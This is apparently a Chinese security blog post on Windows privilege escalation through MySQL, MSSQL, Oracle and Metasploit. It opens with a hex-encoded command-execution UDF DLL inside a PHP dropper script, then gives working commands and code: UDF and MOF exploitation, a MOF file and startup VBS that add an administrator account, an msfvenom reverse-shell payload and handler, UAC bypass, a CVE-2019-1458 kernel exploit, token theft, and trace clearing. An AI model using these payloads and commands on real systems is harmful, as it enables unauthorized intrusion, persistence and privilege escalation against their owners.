F75106A016A008D4EF8E82100000085C074186A008D45FC50FF750CFF7508FF7604FF15984000108B45FC5EC9C20800558BEC81EC04010000568BF1578DBE1C0100008B0785C0740A50FF15584000108327008DBE180100008B0785C0538B1DA4400010740650FFD38327008B460C83F8FF740750FFD3834E0CFF83BE1401000000740F8D4610803800740750FF15AC400010837D08007412FF75088D7E1057E8E2090000595933DBEB278D85FCFEFFFF506804010000FF156C4000108D7E105733DB53538D85FCFEFFFF50FF156840001053536A02535368000000C057FF156440001083F8FF89460C5B7507C6070033C0EB0C8B450C89861401000033C0405F5EC9C208008B5424048B4208568B308972088B303B353460001074038956048B72048970048B49043B51045E7505894104EB0E8B4A043B1175048901EB038941088910894204C204008B41048B48048B15346000103BCA741A568B7424088B3639710C7D058B4908EB048BC18B093BCA75EE5EC204005356578B7C24103B3D346000108BD98BF7741DFF76088BCBE8E3FFFFFF8B3657E8520800003B3534600010598BFE75E35F5E5BC20400558BEC83EC105356894DF8578B7D0C8D4D0CE8AAFCFFFF8B37A1346000103BF08D5F08897DFC895DF475048B33EB188B0B3BC8741251E8F1FBFFFF8945FC83C0088B30598945F48D4DF0FF15B84000108B45FC3BC774608B0F8941048B0F89083B037505894604EB178B48048B55F4894E048B480489318B0B890A8B0B8941048B5DF88B4B043979047505894104EB0E8B4F04393975048901EB038941088B4F048948048B48148B5714895014894F14897DFC8BC7EB7B8B48048B55F8894E048B4A043979047505897104EB0E8B4F04393975048931EB038971088B4A043939894DF475238B1B3B1D3460001075078B5F048919EB1256E830FBFFFF8B55F8598B4DF489018B45FC8B5A04397B08751F8B0F3B0D3460001075088B4F04894B08EB0D56E8EEFAFFFF8943088B45FC598B5DF833FF473978140F850B010000E9B9000000397E140F85FA0000008B4E048B013BF075728B410883781400751A8978148B460483601400FF76048BCBE8E7FDFFFF8B46048B40088B0839791475088B4808397914746E8B480839791475178B0889791483601400508BCBE8A1FAFFFF8B46048B40088B4E048B49148948148B4E048979148B4008897814FF76048BCBE894FDFFFFEB7F8378140075198978148B460483601400FF76048BCBE860FAFFFF8B46048B008B4808397914751C8B083979147515836014008B76048B43043B70040F853BFFFFFFEB3C8B0839791475178B480889791483601400508BCBE836FDFFFF8B46048B008B4E048B49148948148B4E048979148B00897814FF76048BCBE8FBF9FFFF897E148D4DF0FF15BC400010FF75FCE8E7050000FF4B0C8B4508598B4D0C5F5E89085BC9C20800558BEC51568BF1837E0C008B4D0C74388B46043B087531394510752CFF70048BCEE837FDFFFF8B0D346000108B46048948048B460483660C0089008B46048940088B46048B08EB253B4D107420578BF98D4D0CE8FCF9FFFF578D45FC508BCEE82FFDFFFF8B4D0C3B4D1075E25F8B450889085EC9C20C00558BEC5156578B7D0C578BF1E8A8FCFFFF8B76043BC689450C740C8B0F3B480C7C058D450CEB068975FC8D45FC8B088B45085F89085EC9C20800558BEC51515356576A188BF9E8290500008BF05933DB8D4DF8895E04C74614010000008975FCFF15B8400010391D346000107513893534600010891EA134600010895DFC895808FF05386000108D4DF8FF15BC400010395DFC7409FF75FCE8C0040000598B35346000106A18E8C9040000897004895814894704895F0C5989008B47045F5E8940085BC9C3558BEC5356576A188BD9E8A00400008B7510FF75148BF883671400897704A1346000108907A1346000108947088D470C50E812F9FFFF83C40CFF430C3B730474258B450C3B0534600010751A8B45148B003B460C7C10897E088B43043B7008751C897808EB17893E8B43043BF075088978048B4304EBEA3B30750289388B43043B78048BF70F84B00000008B4604837814000F85A30000008B50048B0A3BC175598B4A0883791400751E8B560433C0408942148941148B46048B4004836014008B46048B7004EB673B7008750A8BF0568BCBE8D9FAFFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE8A0F7FFFFEB358379140074AA3B30750A8BF0568BCBE88AF7FFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE881FAFFFF8B43043B70040F8550FFFFFF8B43048B4004C74014010000008B450889385F5E5B5DC21000558BEC51568BF18B46048B0850518D45FC508BCEE857FDFFFFFF7604E8230300008366040083660C00598D4DFC33F6FF15B8400010FF0D38600010750D8B3534600010832534600010008D4DFCFF15BC40001085F6740756E8E7020000595EC9C3558BEC515356578BF98B47048B70048BD8A1346000103BF0B201741C8B4D0C8B093B4E0C8BDE0F9CC284D274048B36EB038B76083BF075E9807F08007405FF750CEB2684D28BCB894DFC74128B47043B1874EB8D4DFCE8CEF6FFFF8B4DFC8B510C8B450C3B107D195053568D450C508BCFE8D5FDFFFF8B088B4508C6400401EB078B4508C64004005F5E89085BC9C20800568BF18D461450FF15704000108D4E045EE9F8FEFFFF558BEC515153568BF18D461457508945F8FF15784000108D4508508D45FC8D5E04508BCBE8B6FCFFFF8B7DFC3B7E0874198B471085C074068B0850FF5108578D4508508BCBE8B1F9FFFFFF75F8FF15744000105F5E5BC9C20400558BEC5151FF750C8D45F850E8EEFEFFFF8B45088B4DF889088A4DFC884804C9C20800568BF18D4E04C6410800E88DFCFFFF8326008D461450FF157C4000108BC65EC3558BEC83EC108B45088B008365FC008945F88D45F8508D45F050E89EFFFFFF8B0083C010C9C20400558BEC518B4518568B75148326008308FF837D0C00894DFC750CA1146000108906E94A010000538B1DCC400010578B7D1068784A0010FF37FFD385C059590F842301000068744A0010FF37FFD385C059590F8410010000E8E2F6FFFF8BF085F6750E8B4514C700644A0010E9FE00000068604A0010FF37FFD385C0595975158D46085057FF750CE809E4FFFF83C40CE99700000068584A0010FF37FFD385C05959750F8D46085057FF750CE84AE4FFFFEBDA684C4A0010FF37FFD385C05959750F57FF750C8D460850E892EDFFFFEBBC68484A0010FF37FFD385C05959750F57FF750C8D460850E850E7FFFFEB9E68404A0010FF37FFD385C05959750F57FF750C8D460850E8FFF1FFFFEB808D7E088B0768284A001057FF50088B0759596AFFFF35146000108BCFFF50048BCEE88BF3FFFF8B4D1489018BCEE8E8F3FFFF8B5DFC8B4D188D7B14578901FF15784000108D4508508D4B04E87CFEFFFF578930FF1574400010EB07A11460001089065F5B33C05EC9C21400FF742404E80200000059C3FF2500410010FF25F4400010FF25F0400010FF25E8400010CCCCCCCCCCCCCCCCCCCC513D001000008D4C2408721481E9001000002D0010000085013D0010000073EC2BC88BC485018BE18B088B400450C3CCFF25C4400010CCCCCCCCCCCCCCCCCCCC6AFF5064A100000000508B44240C64892500000000896C240C8D6C240C50C3CCFF25E0400010FF25DC400010FF25D04000108B44240885C0750E39053C6000107E2EFF0D3C6000108B0D1041001083F8018B09890D40600010753F6880000000FF150841001085C059A348600010750433C0EB66832000A14860001068046000106800600010A344600010E8EA000000FF053C6000105959EB3D85C07539A14860001085C074308B0D44600010568D71FC3BF072128B0E85C97407FFD1A14860001083EE04EBEA50FF150041001083254860001000595E6A0158C20C00558BEC538B5D08568B750C578B7D1085F67509833D3C60001000EB2683FE01740583FE027522A14C60001085C07409575653FFD085C0740C575653E815FFFFFF85C0750433C0EB4E575653E80BE4FFFF83FE0189450C750C85C07537575053E8F1FEFFFF85F6740583FE037526575653E8E0FEFFFF85C0750321450C837D0C007411A14C60001085C07408575653FFD089450C8B450C5F5E5B5DC20C00FF25C8400010FF2524410010FF2518410010FF251C410010FF2520410010FF2538410010FF253C410010FF25344100108D4DDCE9C2E1FFFFB8884A0010E934FEFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000000000000636D642E657865202F6320257300000055736167653A636D6420226E65742075736572220D0A0D0A0000000055736167653A6578656320226E65742075736572220D0A0D0A000000CB120010000000000D0A7073202D6C0920C1D0B3F6CBF9D3D0BDF8B3CC0D0A7073202D6D73206E616D650920C1D0B3F6BCD3D4D8C1CBD6B8B6A8C4A3BFE9C3FBB5C4BDF8B3CC0D0A7073202D6D70207069640920C1D0B3F6D6B8B6A8BDF8B3CCB5C4CBF9D3D0C4A3BFE90D0A7073202D6B70207069640920B9D8B1D5D2BBB8F6BDF8B3CC0D0A7073202D6B6E206E616D650920B9D8B1D5CBF9D3D0D6B8B6A8B5C4BDF8B3CCC3FB0D0A0000002573093C3078252E38583E0D0A0000004D6F64756C65506174680942617365416464726573730D0A0000000025640925735C25730925730D0A000000456E756D50726F6365737365732829206572726F722E0D0A000000005365446562756750726976696C656765000000007073202D6B6E206E616D650D0A7073202D6B70207069640D0A0000007073202D6D73206E616D650D0A7073202D6D70207069640D0A00000052746C41646A75737450726976696C65676500005A7753687574646F776E53797374656D000000004E54444C4C2E444C4C0000004661696C656420546F2053687574646F776E00004661696C656420546F205265626F6F74000000004661696C656420546F204C6F676F66660000000049732054616B696E6720506C6163652E2E2E2E2E2E0D0A00536553687574646F776E50726976696C656765000000000055534147453A0D0A20202020202073687574646F776E205B202D30313233345D0D0A2020202020202D30202020206C6F676F66662E0D0A2020202020202D31202020207265626F6F742E0D0A2020202020202D3220202020706F7765726F66662E0D0A2020202020202D33202020207375706572207265626F6F742E0D0A2020202020202D342020202073757065722073687574646F776E2E0D0A6578616D706C653A0D0A20202020202073687574646F776E202D330D0A0000000077696E7374612E646C6C000057696E53746174696F6E5265736574005554494C444C4C2E646C6C00537472436F6E6E656374537461746500252D3131642020252D3133732020252D3133732020252D3133732020252D313573202025730D0A00202020200000000025642E25642E25642E25640053657373696F6E49442020202053657373696F6E4E616D6520202020557365724E616D6520202020202020436C69656E744E616D6520202020202020495020202020202020202020202020202053746174650D0A00000000456E756D6572617465205465726D696E616C2053657373696F6E73204661696C65642E2025640D0A000000004661696C20546F20536574204E6577205465726D696E616C205365727669636520506F72740D0A00546865205465726D696E616C205365727669636520506F727420486173204265656E2053657420546F2025640D0A00000000000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D54637000000000506F72744E756D62657200006644656E795453436F6E6E656374696F6E73000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C20536572766572000000005453456E61626C656400000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D5365727669636500000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D44440000000053746172740000005465726D696E616C2053657276696365205374617475733A2025730D0A00000044697361626C656400000000456E61626C6564005265674F70656E4B65794578204572726F722E0D0A0000005465726D696E616C205365727669636520506F72743A2025640D0A00536574204E6577205465726D696E616C2053657276696365204661696C65640D0A000000536574205465726D696E616C20536572766963652044697361626C65640D0A00536574205465726D696E616C205365727669636520456E61626C65642E0D0A006C6F676F666600007175657279000000766965770000000064697361626C6500656E61626C65000070000000000000004445534352495054494F4E3A0D0A202020202020202020202020436F6E666967205465726D696E616C205365727669636520537570706F72747320323030302F78702F323030332E0D0A55534147453A0D0A2020202020207465726D737663202D656E61626C65202D64697361626C65202D76696577202D70203C6E6577706F72743E202D7175657279202D6C6F676F6666203C73657373696F6E2069643E0D0A2020202020202D656E61626C6520202020456E61626C65205465726D696E616C20536572766963652E0D0A2020202020202D64697361626C6520202044697361626C65205465726D696E616C20536572766963652E0D0A2020202020202D7669657720202020202056696577205465726D696E616C20536572766963652053657474696E67732E0D0A2020202020202D70202020202020202020536574204E6577205465726D696E616C205365727669636520506F72742E0D0A6578616D706C653A0D0A2020202020207465726D737663202D71756572790D0A2020202020207465726D737663202D6C6F676F666620310D0A2020202020207465726D737663202D656E61626C65202D7020333339390D0A2020202020207465726D737663202D7020333339390D0A2020202020207465726D737663202D766965770D0A0099210010D1210010E22100100C2200100000000000000000C000000000000046762F0010762F0010762F0010F7230010D5240010F723001099210010D1210010E22100102D2400102E4F4350000000000D0A68656C700D0A436D6420202020202020202D3E0D0A45786563202020202020202D3E0D0A53687574646F776E2020203D3E0D0A70732020202020202020203D3E0D0A5465726D537663202020203D3E0D0A0D0A000000556E6B6E6F776E20436F6D6D616E642E3A28200D0A0D0A005465726D537663007073000073687574646F776E000000004578656300000000436D6400455F4F55544F464D454D4F52590000003F00000068656C7000000000FFFFFFFFFA3000102005931901000000804A0010000000000000000000000000000000008C4B00000000000000000000E24E000034400000844C00000000000000000000004F00002C410000584B00000000000000000000EE4F0000004000009C4C000000000000000000000E50000044410000104C000000000000000000004C500000B84000001C4C000000000000000000002E510000C4400000704C00000000000000000000AA510000184100008C4C00000000000000000000FA510000344100000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000071025365744C6173744572726F7200009E025465726D696E61746550726F6365737300001B00436C6F736548616E646C65001A014765744C6173744572726F7200009602536C65657000DF02577269746546696C6500CE0257616974466F7253696E676C654F626A6563740018025265616446696C650000F9015065656B4E616D65645069706500440043726561746550726F63657373410000500147657453746172747570496E666F41004300437265617465506970650000F70047657443757272656E7450726F63657373006D014765745469636B436F756E740000EF014F70656E50726F63657373003E0147657450726F63416464726573730000C2014C6F61644C696272617279410000D2025769646543686172546F4D756C74694279746500B001496E7465726C6F636B6564496E6372656D656E740000AD01496E7465726C6F636B656444656372656D656E740000D6014D6170566965774F6646696C6500350043726561746546696C654D617070696E67410000B002556E6D6170566965774F6646696C6500120147657446696C6553697A6500570044656C65746546696C654100340043726561746546696C654100630147657454656D7046696C654E616D65410000650147657454656D7050617468410000550044656C657465437269746963616C53656374696F6E00C1014C65617665437269746963616C53656374696F6E00006600456E746572437269746963616C53656374696F6E0000AA01496E697469616C697A65437269746963616C53656374696F6E004B45524E454C33322E646C6C0000D3004578697457696E646F77734578005553455233322E646C6C0000170041646A757374546F6B656E50726976696C6567657300F5004C6F6F6B757050726976696C65676556616C7565410042014F70656E50726F63657373546F6B656E0000EF004C6F6F6B75704163636F756E745369644100D000476574546F6B656E496E666F726D6174696F6E005B01526567436C6F73654B6579007B01526567517565727956616C7565457841000072015265674F70656E4B657945784100860152656753657456616C75654578410000640152656744656C65746556616C7565410071015265674F70656E4B657941005E015265674372656174654B6579410041445641504933322E646C6C00002E00436F496E697469616C697A65457800006F6C6533322E646C6C000B013F3F315F4C6F636B697440737464404051414540585A0000A2003F3F305F4C6F636B697440737464404051414540585A00004D5356435036302E646C6C005753325F33322E646C6C00003D0261746F6900005E02667265650000B202737072696E74660091026D616C6C6F63000059015F6D6273636D70005F015F6D627369636D700000BE027374726C656E00000F003F3F3240594150415849405A0000C502737472737472000099026D656D7365740000E6027763736C656E000049005F5F4378784672616D6548616E646C65720096026D656D636D70000092015F7075726563616C6C00AD027365746C6F63616C6500DC0276737072696E74660000BA027374726370790000C1015F73747269636D7000004D53564352542E646C6C00000F015F696E69747465726D009D005F61646A7573745F6664697600000C004765744D6F64756C65426173654E616D654100000E004765744D6F64756C6546696C654E616D6545784100000400456E756D50726F636573734D6F64756C657300000500456E756D50726F6365737365730050534150492E444C4C000800575453467265654D656D6F7279000C00575453517565727953657373696F6E496E666F726D6174696F6E41000600575453456E756D657261746553657373696F6E73410057545341504933322E646C6C000057494E494E45542E646C6C0000000000000000000000000000000000BFC7514B00000000665200000100000003000000030000004852000054520000605200003314000020140000F4130000725200007852000085520000000001000200546573745544462E646C6C007368656C6C007368656C6C5F6465696E6974007368656C6C5F696E69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000D0490010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000140100000F30163039304E305D307330C430F630043110313F3166317C319C31A531BD31F6310F3231323B3242325A327432B332C632D532193336338733A433F833013407340D34293439349634B234C334DB34033510356D357E359D351436CD36D436DC360137373723383238623874389D38B8382B3969398D39AF39E839013A113A403A483A5D3A713A803ACE3ADF3AE53AF33AF83A063B403B503B693B723B823B8B3B9B3BA43BE43B033C123C1B3C203C263C2D3C343C4A3C533C583C5E3C653C6C3CA53CAB3CC43C333D443D683D6F3D7C3D833D9F3DFC3D013E1E3E2C3E4F3E553E803E9E3EA33EC63EEF3EF63E023F203F403F573F603F713F813F8C3F963FBF3FC53FDC3FF63FFF3F000000200000F0000000283051305830653076308E30B230D230E130F53012312C3146315D317231A431DB31EE3116323C32533268328532A832B332BE32D432F43245336D33B633BB33C233C933CF33143456345D34663475349E34A4341935413555358435AE35C335D5350C36473675369336BC36EE368B37B637F0383739E839EE39F639FD39093A123A263A6A3A713A913AD03BD63BDE3BE43BEE3B123C9A3CBA3CF63C3C3D873D953D9E3DB13DD33DDD3D013E1F3E3D3E5B3E7E3E8E3EB83ECD3ED43EF03EF63EFC3E023F423F723F783F7E3F8C3F943F9A3FA53FB23FBA3FC83FCD3FD23FD73FE23FEF3FF93F000000300000280000000E301A30203042305430B030CC30D230D830DE30E430EA30F030F63003310000004000002C00000098318039843988398C39A039A439A839AC39B039B439B839BC39C039C439843A903A0000006000000C00000014300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000,CHAR))');
	if (mysql_errno($conn) != 0) {
		echo mysql_error().'<br/>';
		mysql_close($conn);
		exit();
	}
	mysql_query('select c from udftmp into dumpfile "'.$path.'"');
	if (mysql_errno($conn) != 0) {
		echo mysql_error(). '<br/>';
		mysql_query('drop table udftmp');
		mysql_close($conn);
		exit();
	}
	mysql_query('drop table udftmp');
	if (mysql_errno($conn) !=0)
		echo 'Dump DLL Failed.'.mysql_error();
	else
		echo 'Dump DLL Success!';
	mysql_close($conn);
}
?>
</body>
</html>
UDF手工提权
  • 获取UDF:将sqlmap\data\udf\中找到对应系统的dll_文件,复制到sqlmap\extra\cloak\,输入以下命令即可得到
    • SQLMap自带的shell及一些二进制文件,为了防止被误杀都经过异或方式编码,不能直接使用,需要利用SQLMap自带的解码工具cloak.py进行解码
$ python cloak.py -d -i lib_mysqludf_sys.dll_
  • 寻找目录
    • MySQL<5.1,UDF导出到系统目录c:/windows/system32/
    • MySQL>5.1,UDF导出到MySQL安装目录lib\plugin\目录(该目录默认不存在,需手动创建)
-- 寻找MySQL目录
mysql> select @@basedir;
mysql> show variables like '%plugin%';

-- 利用NTFS ADS创建目录,有Webshell的情况下可直接菜刀创建
mysql> select '123' into dumpfile 'C:\\phpStudy\\MySQL\\lib::$INDEX_ALLOCATION'; 
mysql> select '123' into dumpfile 'C:\phpStudy\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
  • 导出UDF:直接上传没有权限,可通过MySQL语句写入
-- 在【本地】以二进制读取UDF并转换十六进制
mysql> select hex(load_file("C:\\udf.dll")) into dumpfile 'C:\\myudf.txt';

-- 在【靶机】写入UDF,这里将UDF文件命名为myudf.dll
mysql> select unhex ('十六进制UDF') into dumpfile "C:\\Program Files\\MySQL\\lib\\plugin\\myudf.dll";

-- 出现secure-file-priv相关报错,需要修改mysql配置文件my.ini或mysql.cnf
-- secure_file_priv=/ # 允许导入到任意路径
  • 利用UDF创建用户自定义函数
mysql> create function sys_eval returns string soname 'myudf.dll';
  • 利用函数执行命令
mysql> select sys_eval("whoami")

MOF提权

MOF提权条件
  • Windows 2003及以下版本
  • MySQL启动身份具有权限去读写c:/windows/system32/wbem/mof目录
  • secure-file-priv参数不为null
MOF提权原理

MOF文件每五秒就会执行,而且是系统权限,通过MySQL使用load_file 将文件写入/wbme/mof,然后系统每隔五秒就会执行一次上传的MOF。MOF当中有一段是vbs脚本,可以通过控制这段vbs脚本的内容让系统执行命令,进行提权。

  • nullevt.mof的利用代码如下:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter {
  EventNamespace = "Root\\Cimv2";
  Name = "filtP2";
  Query = "Select * From __InstanceModificationEvent "
  "Where TargetInstance Isa \"Win32_LocalTime\" "
  "And TargetInstance.Second = 5";
  QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer {
  Name = "consPCSV2";
  ScriptingEngine = "JScript";
# 执行命令,新建用户naraku
  ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user naraku 123456 /add\")";
};
instance of __FilterToConsumerBinding {
  Consumer = $Consumer;
  Filter = $EventFilter;
};
提权步骤
  • 将上面的脚本上传到有读写权限的目录下,如:C:/xxx/
  • 使用sql语句将文件导入到c:/windows/system32/wbem/mof/
    • 这里不能使用outfile,因为会在末端写入新行,而MOF在被当作二进制文件时无法正常执行,所以需要用dumpfile导出一行数据。
select load_file("C:/xxx/test.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"
  • 当我们成功把MOF导出时,mof就会直接被执行,且5秒创建一次用户
痕迹清除
  • 提权成功后,就算被删号,MOF也会在五秒内将原账号重建,如果要删除入侵账号可以执行以下命令:
$ net stop winmgmt
$ del c:/windows/system32/wbem/repository
$ net start winmgmt
  • 然后重启服务即可

启动项提权

  • 已知root密码
  • file_priv不为null
create table a (cmd text); 
insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 
insert into a values ("a=wshshell.run (""cmd.exe /c net user naraku 123456 /add"",0) " ); 
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators naraku /add"",0) " ); 
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";

MSSQL

  • 前提:拿到SA密码

利用方式

  • 传统xp_cmdshell利用
    • xp_cmdshell被删如何恢复
  • 借助COM组件执行命令
  • 借助CLR执行命令(类似MySQL UDF)
  • 本地Hash注入+端口转发/Socks实现无密码连接目标内网MSSQL
  • 利用Windows访问令牌实现无密码连接目标内网MSSQL

Oracle

  • 通常情况下Oracle服务的运行权限都非常高
  • MSF下各类自动化利用模块
  • 通常情况下,Oracle服务的运行权限都比较高

MSF提权

  • 注意以下命令执行时的状态
    • $:Linux命令行下
    • msf:进入MSF控制台
    • meterpreter:进入某个session
# 生成木马并放入靶机
$ msfvenom -p windows/meterpreter_reverse_tcp lhost=<攻击机IP> lport=<攻击机监听端口> -f exe -o /tmp/win.exe
# 攻击机监听
$ msfconsole
msf> use exploit/multi/handler 
msf> set payload windows/meterpreter_reverse_tcp
msf> set lhost <攻击机IP>
msf> set lport <攻击机端口>
msf> exploit
# 靶机运行,此时攻击机MSF会接收到反弹的Shell,在MSF中运行shell命令
meterpreter> shell 
C:\Users\Naraku\Desktop>whoami
naraku-win7\naraku
# 出现中文乱码可运行
# C:\Users\Naraku\Desktop>chcp 65001

GetSystem

  • 直接运行getsystem
meterpreter> getsystem

BypassUAC

  • 相关脚本
    • use exploit/windows/local/bypassuac
    • use exploit/windows/local/bypassuac_injection
    • use windows/local/bypassuac_vbs
    • use windows/local/ask
meterpreter> background  # 后台session 
msf> use exploit/windows/local/bypassuac
msf> set SESSION <session_id>  
# 后台session时会返回session_id,如不清楚可以使用命令sessions -l
msf> run

内核提权

# 查询补丁
meterpreter> run post/windows/gather/enum_patches 
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010
  • 也可以使用local_exploit_suggester查询哪些Exp可以利用。
# 查询Exp
msf> use post/multi/recon/local_exploit_suggester 
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

这里将上一步查询到的Exp打了一遍发现都没有成功,回头一看发现原来是系统位数的原因。这里的Meterpreter运行在32位,而系统位数为64位。

  • 因此需要做进程迁移,将Meterpreter迁移到一个64位的进程。
meterpreter> sysinfo         # 查看位数
meterpreter> ps              # 查看进程
meterpreter > migrate <PID>  # 进程迁移

重复前面使用local_exploit_suggester那一步,可以看到现在查询的是64位的Exp

  • 这里选择选个比较新的CVE_2019_1458
msf> use exploit/windows/local/cve_2019_1458_wizardopium 
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

令牌操纵

  • incognito假冒令牌
meterpreter> use incognito                                  
meterpreter> list_tokens -u                          # 查看可用的token
meterpreter> impersonate_token 'NT AUTHORITY\SYSTEM' # 假冒SYSTEM token
meterpreter> execute -f cmd.exe -i –t                # -t使用假冒的token 执行
meterpreter> rev2self                               # 返回原始token
  • steal_token窃取令牌
meterpreter> ps                 # 查看进程
meterpreter> steal_token <PID>  # 从指定进程中窃取token
meterpreter> drop_token         # 删除窃取的token

SMB系列RCE

基本绝迹

  • MS08-067
  • MS17-010

参考

from

Leave a Reply

您的电子邮箱地址不会被公开。 必填项已用 * 标注